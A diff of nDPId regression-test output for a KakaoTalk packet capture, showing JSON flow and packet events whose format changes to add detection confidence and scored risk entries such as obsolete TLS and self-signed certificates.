-00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2858,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069211639,"flow_last_seen":1430069211712,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1430069211712,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2858,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069211639,"flow_last_seen":1430069211712,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1430069211712,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2869,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1430069211843,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":118,"pkt_l4_len":82,"ts_msec":1430069211843,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGYfywAANRH9Kwq8AQEKGFK8ADVihwBSfKJimIGAAAEAAgAAAAAEbXF0dAhmYWNlYm9vawNjb20AAAEAAcAMAAUAAQAABNAACwRtcXR0A3Z2dsARwC8AAQABAAAAAQAErfxhAg=="}
-00765{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2869,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069211640,"flow_last_seen":1430069211843,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1430069211843,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"mqtt.facebook.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.252.97.2"}}
-00898{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2893,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069211639,"flow_last_seen":1430069212207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":349,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1430069212207,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"07dddc59e60135c7b479d39c3ae686af","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069201833,"flow_last_seen":1430069212950,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":2,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.151.233","src_port":53974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
+00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2869,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069211640,"flow_last_seen":1430069211843,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1430069211843,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"mqtt.facebook.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.252.97.2"}}
+01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2893,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069211639,"flow_last_seen":1430069212207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":349,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1430069212207,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"07dddc59e60135c7b479d39c3ae686af","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}}
+00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069201833,"flow_last_seen":1430069212950,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":2,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.151.233","src_port":53974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069201833,"flow_last_seen":1430069212950,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":2,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.151.233","src_port":53974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
-00619{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069211505,"flow_last_seen":1430069211505,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.88.128","dst_ip":"10.24.82.188","src_port":443,"dst_port":59912,"l4_proto":"tcp","ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069211505,"flow_last_seen":1430069211505,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.88.128","dst_ip":"10.24.82.188","src_port":443,"dst_port":59912,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069211505,"flow_last_seen":1430069211505,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.88.128","dst_ip":"10.24.82.188","src_port":443,"dst_port":59912,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1430069211639,"flow_last_seen":1430069213599,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":2372,"flow_avg_l4_payload_len":81,"midstream":0,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
-00619{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069141923,"flow_last_seen":1430069142383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":31,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.185.236","src_port":58916,"dst_port":5222,"l4_proto":"tcp","ndpi": {"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069141923,"flow_last_seen":1430069142383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":31,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.185.236","src_port":58916,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069141923,"flow_last_seen":1430069142383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":31,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.185.236","src_port":58916,"dst_port":5222,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
-00618{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069193291,"flow_last_seen":1430069193291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.122.1","dst_ip":"10.24.82.188","src_port":443,"dst_port":52123,"l4_proto":"tcp","ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069193291,"flow_last_seen":1430069193291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.122.1","dst_ip":"10.24.82.188","src_port":443,"dst_port":52123,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069193291,"flow_last_seen":1430069193291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.122.1","dst_ip":"10.24.82.188","src_port":443,"dst_port":52123,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069161865,"flow_last_seen":1430069161865,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"216.58.220.161","dst_ip":"10.24.82.188","src_port":443,"dst_port":56697,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069161865,"flow_last_seen":1430069161865,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"216.58.220.161","dst_ip":"10.24.82.188","src_port":443,"dst_port":56697,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069161865,"flow_last_seen":1430069161865,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"216.58.220.161","dst_ip":"10.24.82.188","src_port":443,"dst_port":56697,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
-00615{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069210863,"flow_last_seen":1430069210863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.194.117.229","dst_ip":"10.24.82.188","src_port":443,"dst_port":38380,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069210863,"flow_last_seen":1430069210863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.194.117.229","dst_ip":"10.24.82.188","src_port":443,"dst_port":38380,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069210863,"flow_last_seen":1430069210863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.194.117.229","dst_ip":"10.24.82.188","src_port":443,"dst_port":38380,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1488,"flow_first_seen":1430069171389,"flow_last_seen":1430069216410,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":133038,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10268,"dst_port":23046,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"RTP","breed":"Acceptable","category":"Media"}}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1430069170975,"flow_last_seen":1430069216076,"flow_idle_time":180000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":2144,"flow_avg_l4_payload_len":97,"midstream":0,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10269,"dst_port":23047,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}}
-00704{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1430069159456,"flow_last_seen":1430069163250,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4":"Binary application transfer"},"proto":"HTTP.QQ","breed":"Fun","category":"Download"}}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069141261,"flow_last_seen":1430069141741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34533,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1488,"flow_first_seen":1430069171389,"flow_last_seen":1430069216410,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":133038,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10268,"dst_port":23046,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1430069170975,"flow_last_seen":1430069216076,"flow_idle_time":180000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":2144,"flow_avg_l4_payload_len":97,"midstream":0,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10269,"dst_port":23047,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}}
+00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1430069159456,"flow_last_seen":1430069163250,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Download"}}
+00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069141261,"flow_last_seen":1430069141741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34533,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069141261,"flow_last_seen":1430069141741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34533,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
-00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1430069163715,"flow_last_seen":1430069216555,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":7008,"flow_avg_l4_payload_len":155,"midstream":0,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","6":"Self-signed Certificate","7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
-00618{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+01170{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1430069163715,"flow_last_seen":1430069216555,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":7008,"flow_avg_l4_payload_len":155,"midstream":0,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}}
+00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
